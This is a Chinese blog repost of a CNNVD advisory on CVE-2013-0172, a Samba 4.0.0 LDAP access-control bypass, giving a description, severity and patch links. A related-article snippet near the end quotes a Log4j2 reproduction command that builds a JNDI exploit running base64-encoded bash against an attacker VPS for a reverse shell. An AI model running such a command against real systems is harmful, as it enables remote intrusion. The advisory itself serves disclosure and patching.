Samba objectClass LDAP 目录对象访问绕过漏洞

最新推荐文章于 2024-09-13 08:49:09 发布
最新推荐文章于 2024-09-13 08:49:09 发布
阅读量81 收藏
点赞数
文章标签: ldap
原文链接:http://www.cnblogs.com/security4399/archive/2013/01/18/2866550.html
版权

漏洞名称:Samba objectClass LDAP 目录对象访问绕过漏洞
CNNVD编号:CNNVD-201301-269
发布时间:2013-01-17
更新时间:2013-01-17
危害等级:中危  中危
漏洞类型:权限许可和访问控制
威胁类型:本地
CVE编号:CVE-2013-0172

Samba是一套实现SMB(Server Messages Block)协议、跨平台进行文件共享和打印共享服务的程序。 
        Samba 4.0.0版本中存在安全绕过漏洞,该漏洞源于处理基于LDAP Access Control Entries的对象类时存在错误,允许写入对象的权限。攻击者利用该漏洞修改对象属性。通过‘pre-windows 2000能力访问’组,成功利用需要用户给出对象类的权限。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: 
        http://www.samba.org/samba/security/

来源:www.samba.org 
链接:http://www.samba.org/samba/security/CVE-2013-0172 

来源:SECUNIA 
名称:51840 
链接:http://secunia.com/advisories/51840

转载于:https://www.cnblogs.com/security4399/archive/2013/01/18/2866550.html

weixin_30781107
关注
samba共享目录权限问题
09-15
在本文中,我们将深入探讨如何解决Samba共享目录的权限问题。 首先,要设置Samba共享,必须先安装Samba服务。在Ubuntu或Debian等基于APT的系统中,可以使用以下命令安装Samba和smbfs: ```bash sudo apt-get ...
[漏洞] Samba 升级
唐僧没有肉的博客
09-28 1953
现在关于 Samba漏洞也挺多的,反正我公司木有用. Samba 中间人攻击安全功能绕过漏洞(CVE-2017-12151) Samba 中间人攻击安全功能绕过漏洞(CVE-2017-12150)   以 4.4.14 版本升级为例:   # yum -y install gnutls-devel python python-devel python-lib* libacl
漏洞预警:Samba root权限执行漏洞
weixin_34402408的博客
04-12 117
2019独角兽企业重金招聘Python工程师标准>>> ...
ObjectClass的关系
weixin_34273481的博客
06-04 1033
Object类型 对象:一组数据和功能的集合。 所有的函数(function)都是对象,那么对象就会有Object类型所具有的任何方法和属性,比如: constructor 指向构造函数 hasOwnProperty(propertyName) 检查给定的属性是否属于当前实例 isPrototypeof(object) 检查传入的对象是否是当前对象的原型 propertyIsEnumberabl...
Samba 'smbcacls'命令安全绕过漏洞
weixin_30345055的博客
03-18 192
漏洞版本: Samba 4.x 漏洞描述: Bugtraq ID:66232 CVE ID:CVE-2013-6442 Samba是一款实现SMB协议、跨平台进行文件共享和打印共享服务的程序。 当使用"-C|--chown name"或"-G|--chgrp name"选项时Samba的smbcacls工具存在错误,允许攻击者利用漏洞绕过安全限制访问受限资源。 ...
Automated SAMBA +LDAP-开源
05-06
该项目是一个安装脚本,是将FreeBSD 7.1(AMD64 / i386)的“最小安装”转换为具有OpenLDAP后端的功能齐全的Samba PDC所需的软件包的集合。 安装通常需要2分钟左右。
LDAP-based Authentication for Samba.pdf
12-12
LDAP-based Authentication for Samba. This document demonstrates how to install and configure Samba as a primary Domain Controller with a secure LDAP-based authentication mechanism.
samba 配置文件,用于配置samba服务器的共享目录
10-15
添加部分每一行有注释,有需要的可以看看
ubuntu虚拟机及常用工具安装并配置samba共享目录
01-25
这包括编辑samba的配置文件(/etc/samba/smb.conf),添加共享目录的配置信息(如共享目录的名称,路径,是否可浏览,是否只读等),添加samba访问用户,并设置密码,然后重启samba服务。 知识点四:在Windows系统...
代码执行漏洞-Log4j2漏洞
2301_82061181的博客
09-08 261
步骤七:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址...步骤四:发现 /solr/admin/cores?action= 这⾥有个参数可以传。步骤三:先在自己搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果。步骤一:执行以下命令启动靶场环境并在浏览器访问。反弹Shell-base64加密。步骤五:反弹shell。步骤二:访问靶机地址。
log4j
weixin_61074128的博客
09-10 157
通过名字,查找(lookup)LDAP的服务,获取LDAP中存储的数据。
通过LDAP方式使用windows域认证
yank1225的博客
09-10 193
使用ldap连接进行域认证
vulhub靶场log4j2漏洞复现
A2893992091的博客
09-08 300
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号:CVE-2021-44228。
使用LDAP登录GitLab
srebro | 博客
09-10 378
ldap 还需配置add_memberof_module.ldif ,具体参考: https://www.cnblogs.com/panther1942/p/17067317.html。配上ldap 组织架构图: dc=srebro,dc=cn。gitlab.rb 配置如下。
五大注入攻击网络安全类型介绍
鹿鸣天涯
09-13 894
普通注入:XML 注入攻击和SQL 注入攻击的原理一样,利用了XML 解析机制的漏洞,如果系统对用户输入"<",">"没有做转义的处理,攻击者可以修改XML 的数据格式,或者添加新的XML 节点,就会导致解析XML 异常,对流程产生影响。SQL注入是最常见的注入攻击类型之一,攻击者通过在输入字段中插入恶意的SQL代码来改变原本的SQL逻辑或执行额外的SQL语句,来操控数据库执行未授权的操作(如拖库、获取管理员信息、获取 WebShell权限等)。输入验证:对用户输入进行严格的验证和过滤。
NanoAirline航空公司管理系统.zip
最新发布
09-13
NanoAirline是一个基于Spring Boot框架开发的简单航空公司管理系统。该系统旨在提供航空公司的基本管理功能,包括但不限于航班管理、乘客信息管理、机票预订等功能。该系统适用于中小型航空公司或作为大型航空公司管理系统的补充,能够帮助航空公司实现高效、便捷的管理和操作。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
基于Tensorflow的手势识别代码+数据集+文档说明(期末大作业)
09-13
基于Tensorflow的手势识别代码+数据集+文档说明(期末大作业),含有代码注释,新手也可看懂。毕业设计、期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为毕设、课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 基于Tensorflow的手势识别代码+数据集+文档说明(期末大作业),含有代码注释,新手也可看懂。毕业设计、期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为毕设、课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。 基于Tensorflow的手势识别代码+数据集+文档说明(期末大作业),含有代码注释,新手也可看懂。毕业设计、期末大作业、课程设计、高分必看,下载下来,简单部署,就可以使用。该项目可以作为毕设、课程设计期末大作业使用,该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值。基于Tensorflow的手势识别代码+数据集+文档说明(期末大作业),含有代码注释,新手也可看懂
weixin029微信阅读网站小程序+ssm.rar
09-13
所有源码,都是可以运行起来的
基于java的植物健康系统设计与实现.docx
09-13
基于java的植物健康系统设计与实现.docx
使用LDAP实现Samba安全域控认证
"这篇文档是关于如何在Linux系统上安装和配置Samba作为主域控制器,采用安全的基于LDAP(轻量级目录访问协议)的身份验证机制。作者 Keith Robertson 在2006年1月31日编写了这份教程,旨在帮助读者了解如何设置和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值